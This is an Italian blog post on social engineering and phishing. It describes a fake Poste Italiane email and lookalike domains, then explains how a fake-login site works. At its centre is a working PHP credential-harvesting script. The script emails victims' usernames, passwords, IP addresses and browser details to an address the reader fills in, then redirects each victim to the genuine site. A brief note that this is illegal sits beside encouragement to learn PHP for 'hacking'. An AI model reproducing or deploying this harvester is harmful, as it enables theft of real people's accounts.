Molte persone tentano di estrapolare informazioni facendosele dare direttamente dalla persona interessata.
Questo modo di "fregare" la gente, viene chiamato Ingegneria Sociale (dall'inglese social engeenering). È impressionante con quanta facilità l'ingegnere sociale riesce a manipolare le persone per raggiungere i suoi scopi: dal farsi dire un semplice numero di telefono, al codice bancario. È una dote naturale.


Da un po' di anni, però, ingegneri sociali poco esperti o semplici pirati informatici novelli creano siti IDENTICI agli originali chiedendo alla vittima di visitarli ed effettuare il login. Un caso recente è stato l'attacco alle Poste Italiane, in cui arrivava una e-mail somigliante alla loro che chiedeva alla vittima di visitare un sito e di fare il login perchè era stato bloccato un addebito. Naturalmente una persona, spaventata, subito visita il sito e effettua il login. Solo che questi siti fanno tutt'altro che loggare una persona: essi creano un documento e salvano all'interno username e password immessi nel form di login o li inviano via email, in modo che l'attaccante possa leggerli quando vuole ed entrare nell'account della vittima facendo danni.

Da cosa possiamo capire che un sito è fraudolento? Bhè, per iniziare possiamo guardare dal dominio. Ad esempio il sito Paypal è www.paypal.com . Un sito fake potrebbe essere ad esempio www.paypa1.com. Alcuni browsers come Firefox ed Internet Explorer hanno il riconoscimento dei siti fraudolenti e di phishing .

Ma come funziona esattamente?
Un sito fake-login è composto da 2 files chiave e altri opzionali. Il 1° in gergo viene chiamato Index, sarebbe la pagina iniziale dove la vittima deve andare. Il secondo sarebbe lo script che salva i dati immessi nel form.

Un esempio di script in php (send.php) è:

$yourmail = "vostramail@vostramail.com"; if (getenv(HTTP_X_FORWARDED_FOR)){ $ip = getenv(HTTP_X_FORWARDED_FOR); } else { $ip = getenv(REMOTE_ADDR); } $useragent=$_SERVER['HTTP_USER_AGENT']; $td = date("F jS"); $date = date("d M Y"); $time = date("g:i a"); $LogTime = trim(" Date: ".$date.", Time: ".$time); mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nDarthLord\nwww.msn.com","from: $account <$account>"); header( "Location: http://www.verosito.net");

Naturalmente tutto ciò è illegale, quindi evitate di andare in giro rubando account.
Consiglio vivamente di imparare il linguaggio PHP per affinare le tecniche di hacking sul web e/o creare siti dinamici molto efficienti.

Se ti piaciuto l'articolo, iscriviti al feed o alla newsletter per tenerti sempre aggiornato sui nuovi contenuti del blog!